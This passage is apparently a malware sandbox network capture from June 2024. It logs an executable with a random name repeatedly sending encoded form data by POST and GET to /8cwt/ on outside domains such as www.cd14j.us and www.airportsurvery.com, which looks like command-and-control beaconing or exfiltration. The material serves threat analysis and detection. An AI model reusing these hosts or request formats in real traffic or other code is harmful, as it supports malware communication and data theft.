                                      41192.168.11.304988991.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:52.043632030 CEST674OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 45 4b 61 75 2f 7a 67 55 4f 70 61 6b 47 32 38 6d 33 7a 68 55 68 69 33 30 57 63 69 78 2f 59 36 50 53 2b 62 44 72 38 36 56 4a 6f 46 35 48 37 55 5a 71 68 61 4b 71 77 2b 4e 46 68 32 70 71 4a 74 42 42 55 58 43 54 43 42 6a 50 30 4c 43 58 71 35 76 76 4b 59 30 64 30 66 58 62 41 67 57 73 34 35 43 2f 48 6a 55 56 63 71 34 37 47 4b 6d 47 62 64 64 73 54 67 44 62 66 77 73 5a 57 56 72 59 50 41 33 79 55 59 53 48 4a 58 77 42 32 71 59 57 2f 33 4a 32 48 6e 72 35 33 76 75 61 2b 56 52 4f 43 39 55 52 32 54 34 74 4b 31 4d 32 69 73 50 67 54 6d 4e 30 6e 39 48 38 36 58 68 6a 6f 4a 6e 61 37 54 65 4b 67 3d 3d
                                      Data Ascii: 24eluX=EKau/zgUOpakG28m3zhUhi30Wcix/Y6PS+bDr86VJoF5H7UZqhaKqw+NFh2pqJtBBUXCTCBjP0LCXq5vvKY0d0fXbAgWs45C/HjUVcq47GKmGbddsTgDbfwsZWVrYPA3yUYSHJXwB2qYW/3J2Hnr53vua+VROC9UR2T4tK1M2isPgTmN0n9H86XhjoJna7TeKg==
                                      Jun 4, 2024 14:19:52.268194914 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.11.304989091.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:54.801759958 CEST694OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 45 4b 61 75 2f 7a 67 55 4f 70 61 6b 48 57 73 6d 32 55 31 55 32 53 33 33 61 38 69 78 32 34 36 31 53 2b 58 44 72 39 75 46 4a 2b 31 35 4a 2f 51 5a 72 67 61 4b 70 77 2b 4e 4e 42 32 57 75 4a 74 47 42 55 62 67 54 48 68 6a 50 30 33 43 58 6f 52 76 75 35 67 31 62 30 66 4a 51 67 67 49 6a 59 35 43 2f 48 6a 55 56 66 57 65 37 47 43 6d 42 72 74 64 73 78 45 41 59 66 77 76 51 32 56 72 50 66 41 7a 79 55 5a 42 48 49 4c 57 42 77 75 59 57 37 7a 4a 32 32 6e 6f 77 33 76 53 58 65 55 47 66 58 55 41 55 43 62 37 68 61 64 77 7a 58 6f 47 6f 6b 58 58 70 6b 4a 46 76 61 72 4d 2f 70 6b 50 59 35 53 46 58 72 38 31 4e 61 4f 57 49 32 75 79 2f 2f 34 69 7a 4d 59 32 67 41 63 3d
                                      Data Ascii: 24eluX=EKau/zgUOpakHWsm2U1U2S33a8ix2461S+XDr9uFJ+15J/QZrgaKpw+NNB2WuJtGBUbgTHhjP03CXoRvu5g1b0fJQggIjY5C/HjUVfWe7GCmBrtdsxEAYfwvQ2VrPfAzyUZBHILWBwuYW7zJ22now3vSXeUGfXUAUCb7hadwzXoGokXXpkJFvarM/pkPY5SFXr81NaOWI2uy//4izMY2gAc=
                                      Jun 4, 2024 14:19:55.026315928 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.11.304989191.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:57.552762032 CEST1611OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 45 4b 61 75 2f 7a 67 55 4f 70 61 6b 48 57 73 6d 32 55 31 55 32 53 33 33 61 38 69 78 32 34 36 31 53 2b 58 44 72 39 75 46 4a 39 56 35 4a 4b 45 5a 71 48 75 4b 6d 51 2b 4e 53 78 32 58 75 4a 73 44 42 55 54 6b 54 48 6b 57 50 78 37 43 58 4a 78 76 6d 73 4d 31 49 55 66 4a 4e 77 67 4a 73 34 35 58 2f 44 50 51 56 63 75 65 37 47 43 6d 42 6f 6c 64 38 7a 67 41 56 2f 77 73 5a 57 56 6e 59 50 41 66 79 58 6f 30 48 49 66 67 43 41 4f 59 52 62 6a 4a 6c 55 50 6f 2f 33 76 71 45 75 55 4f 66 58 51 32 55 43 75 49 68 61 34 58 7a 51 73 47 73 79 71 62 35 33 55 53 78 5a 33 43 69 61 59 6e 54 34 71 4f 56 5a 30 52 4a 4d 4f 30 50 69 43 43 36 36 59 48 6f 70 4d 67 2b 6d 71 66 39 35 64 77 6b 42 50 59 53 53 6c 59 6f 46 48 71 6a 78 69 2f 63 75 6d 36 48 4f 64 79 55 7a 4a 55 2b 77 4d 38 5a 6a 74 47 4f 55 31 45 49 4a 4e 6f 76 4a 2b 4e 6b 39 47 72 53 66 4b 50 77 57 45 76 32 44 39 78 67 48 7a 49 79 76 73 5a 36 34 31 57 7a 65 6a 30 59 34 4a 61 39 68 41 4b 76 4c 74 4e 6f 4d 54 2f 30 68 2f 6a 46 68 47 51 44 4d 6d 74 71 57 59 [TRUNCATED]
                                      Data Ascii: 24eluX=EKau/zgUOpakHWsm2U1U2S33a8ix2461S+XDr9uFJ9V5JKEZqHuKmQ+NSx2XuJsDBUTkTHkWPx7CXJxvmsM1IUfJNwgJs45X/DPQVcue7GCmBold8zgAV/wsZWVnYPAfyXo0HIfgCAOYRbjJlUPo/3vqEuUOfXQ2UCuIha4XzQsGsyqb53USxZ3CiaYnT4qOVZ0RJMO0PiCC66YHopMg+mqf95dwkBPYSSlYoFHqjxi/cum6HOdyUzJU+wM8ZjtGOU1EIJNovJ+Nk9GrSfKPwWEv2D9xgHzIyvsZ641Wzej0Y4Ja9hAKvLtNoMT/0h/jFhGQDMmtqWYp7tOGSsgNqjqzVnIo7UZ0pMd3p1EegywZMO62IQA4liKjnJIHI4fEy8nw+QN9xQ9KkY6cDIQAMoGYvVyRvTQZgsn57ob3OTEa4+tUtCjXazxpmVmp4jIM2/O6oZAw5OvdC7BTwJIrJV+iwubZucmUyWH9wFKUSWyIqcNWtqsIs2yvQp6aPbJStaYsI62uPdqrqQylt6FXOtCFXfgG6V2VnrtgyTjaSnUS0HJbRzQ5+EoHvFReCKEOvTiKShTZwRnP7sN+CjGhp43TetyMi1NTvxWC2+Xsl+N2fbPZuWRYgjBJ09GtTVz9Vnfn2k4uTMOk2pyPzNgy+2OZStUflVEaU/yhVsXqNMU9y3mkBe65VUOVvl3U/Ares3bnXjrWb/IoFPfuUkC6kdW43+3Eblhl+vaBIOthN0B8EZ27jrEhG+qtSFOnWh0o28YUR3nzIgb8ExEckifQzjmrcOP5r35Iud5BqNO+B4B5gPyzPGeM+7Fnju4Ka1bX38tlf29q6zrHMVroLGAHJo9IRR+tp9XVoWbcuYqQI6cvyYd53yGN0jcQtOiFkTa480wTSmMKYp9cZKzHhB2uEzWmKYAjMckCL3MS+hNwArE1kht4mTxJKNGHubFgK5y1Xp2s97yR6IM5eXK7vlCc6ZBpHI7bDJxYY2/xvN+vkMVs2 [TRUNCATED]
                                      Jun 4, 2024 14:19:57.778769016 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.11.304989291.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:00.301908016 CEST423OUTGET /8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:00.527378082 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.11.3049893192.3.27.169802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:08.740225077 CEST431OUTGET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.respirelavie.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:09.059978008 CEST401INHTTP/1.1 400 Bad Request
                                      Date: Tue, 04 Jun 2024 12:20:07 GMT
                                      Server:
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 150
                                      Connection: close
                                      X-XSS-Protection: 1; mode=block
                                      X-Content-Type-Options: nosniff
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.11.3049894173.232.18.16180
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:14.228513002 CEST704OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 47 69 6b 73 79 76 39 4b 43 41 51 54 66 61 54 58 34 57 4a 4b 4d 42 68 64 47 4c 57 7a 48 37 54 61 46 4c 32 4b 33 38 55 4b 4b 45 33 53 45 37 49 44 58 76 31 79 6d 44 50 57 69 68 68 77 4b 2f 53 47 75 6d 63 67 6e 50 63 65 68 4a 56 71 6a 4b 4a 66 6c 76 43 64 36 6b 53 7a 31 78 30 35 49 59 76 53 62 4a 6c 33 4c 6b 42 33 5a 65 78 34 68 6a 2f 75 61 46 65 76 5a 36 36 52 47 77 58 58 4e 39 4f 53 42 56 62 6e 50 33 31 6e 47 73 72 63 42 67 66 37 6a 2f 57 46 59 2f 77 62 77 4c 5a 30 68 36 4f 37 30 58 59 69 64 57 4f 71 73 51 56 47 4e 78 4d 6b 6a 4e 56 44 46 41 3d 3d
                                      Data Ascii: 24eluX=HCML38UUrPa9Giksyv9KCAQTfaTX4WJKMBhdGLWzH7TaFL2K38UKKE3SE7IDXv1ymDPWihhwK/SGumcgnPcehJVqjKJflvCd6kSz1x05IYvSbJl3LkB3Zex4hj/uaFevZ66RGwXXN9OSBVbnP31nGsrcBgf7j/WFY/wbwLZ0h6O70XYidWOqsQVGNxMkjNVDFA==
                                      Jun 4, 2024 14:20:14.395673037 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:37 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.11.3049895173.232.18.16180
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:16.913436890 CEST724OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 41 43 55 73 30 4f 39 4b 56 77 51 63 51 36 54 58 6a 47 4a 4f 4d 42 64 64 47 4a 36 5a 45 49 6e 61 46 75 4b 4b 32 39 55 4b 5a 30 33 53 4b 62 49 43 54 76 31 39 6d 44 44 65 69 6b 5a 77 4b 2f 47 47 75 6d 4d 67 6e 34 6f 5a 67 5a 56 6f 6f 71 4a 64 72 50 43 64 36 6b 53 7a 31 78 77 48 49 63 44 53 62 5a 56 33 4c 47 35 32 48 4f 78 6e 67 6a 2f 75 4c 56 65 72 5a 36 36 76 47 30 58 39 4e 34 4b 53 42 56 72 6e 4d 6a 68 6b 50 73 72 61 4f 41 65 52 75 2b 7a 4e 65 66 41 39 37 39 42 59 6b 6f 36 78 31 41 70 34 41 56 36 6f 2f 77 70 72 52 77 68 4d 68 50 55 59 59 45 4f 33 53 76 74 77 41 48 2f 69 6a 2f 33 6c 34 4d 42 64 35 73 51 3d
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEInaFuKK29UKZ03SKbICTv19mDDeikZwK/GGumMgn4oZgZVooqJdrPCd6kSz1xwHIcDSbZV3LG52HOxngj/uLVerZ66vG0X9N4KSBVrnMjhkPsraOAeRu+zNefA979BYko6x1Ap4AV6o/wprRwhMhPUYYEO3SvtwAH/ij/3l4MBd5sQ=
                                      Jun 4, 2024 14:20:17.079696894 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:39 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.11.3049896173.232.18.16180
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:19.598864079 CEST1641OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 41 43 55 73 30 4f 39 4b 56 77 51 63 51 36 54 58 6a 47 4a 4f 4d 42 64 64 47 4a 36 5a 45 49 2f 61 47 59 2b 4b 32 61 41 4b 61 30 33 53 56 72 49 66 54 76 31 61 6d 44 62 61 69 6b 45 50 4b 39 2b 47 38 31 30 67 76 74 45 5a 70 5a 56 6f 6e 4b 4a 41 6c 76 43 49 36 6b 69 33 31 78 67 48 49 63 44 53 62 66 5a 33 66 45 42 32 41 2b 78 34 68 6a 2f 79 61 46 65 54 5a 36 79 5a 47 30 44 48 59 63 2b 53 42 78 50 6e 4e 51 5a 6b 41 73 72 59 4e 41 65 4a 75 2b 50 43 65 66 63 35 37 34 39 79 6b 76 57 78 31 47 38 2f 62 6d 53 43 38 67 39 51 53 51 70 6e 6e 50 41 6d 65 32 2b 41 61 66 31 39 41 7a 76 66 75 59 2f 62 6b 65 5a 6e 71 49 4d 6e 33 78 57 74 73 63 35 45 72 76 31 39 68 73 4a 56 48 58 46 62 77 75 48 7a 7a 64 71 70 57 34 79 55 4a 32 38 42 6a 69 33 2b 30 67 72 43 70 6f 77 72 34 33 64 64 6f 72 74 4a 54 68 6c 58 73 4b 51 69 53 77 69 6d 32 35 62 59 4c 71 4e 38 70 46 76 36 59 71 4d 44 49 5a 45 62 63 6e 66 54 4e 56 4d 49 6a 57 65 37 76 56 64 51 62 2f 63 6f 76 42 72 55 33 65 6a [TRUNCATED]
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEI/aGY+K2aAKa03SVrIfTv1amDbaikEPK9+G810gvtEZpZVonKJAlvCI6ki31xgHIcDSbfZ3fEB2A+x4hj/yaFeTZ6yZG0DHYc+SBxPnNQZkAsrYNAeJu+PCefc5749ykvWx1G8/bmSC8g9QSQpnnPAme2+Aaf19AzvfuY/bkeZnqIMn3xWtsc5Erv19hsJVHXFbwuHzzdqpW4yUJ28Bji3+0grCpowr43ddortJThlXsKQiSwim25bYLqN8pFv6YqMDIZEbcnfTNVMIjWe7vVdQb/covBrU3ejCI1OntHlFUU9mT3XIhc1Q+51UH2IJ3wWI1QXTulSNuyxnHWwz9kXFq2VS19hVkzhEqYX3enFpTMsQtddZrsT2+wnYMyZSs8Gr0mom5Cnd3VihMPeuh6bWW3E27Fk50DZMisp9jeGZx/kD3npdM/BI21nzONWTS+/56jWe2/ZRejTNRh4eoxlqt5zPCsth1fKqGABDAYGovtnPA8vj7XzY1xIeN6Ys/Y6pAwhP/EoZmL6VFzB24tCHcOUEU0XHiLoM8UrB8mA2pYXyFJqTlDYkCTDgHSfzxfELyJ3FMmMkUJ6RaEA6SsV7N7myXW0KIyrYsR/NeHed0Ee4+vanshyCMpIM/z6/0+vPJAPOYQPNFN9GmN7qfsxW+3qD96rX6gu0XDULh6Yew4IqIEeJAXmCvRLSOYLrzuJd5ux12kEtYRIenBsRjTN44hC+zftBW5Dx4T9YyVtNWYL9VJu5wC/Ouequ80u7qvt66lGxUsYaMzEhtGcLjaA+IVaPb5zEKkOAiSeNiWKNdxvSMtgmoN6kArrMQFMMhlWpU5EDj4SGteZOS2KgvpNcS/wgdp+Vrcv2bpi4Ui4xYuvHzzF8A5cHyR9eqlVUAKL61lI7L/yECxdHWDARkahIKZPFsmWgzanM2xkY/3pIvyXQhKmz0+d1pFfgDsKOd0399 [TRUNCATED]
                                      Jun 4, 2024 14:20:19.765036106 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:42 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
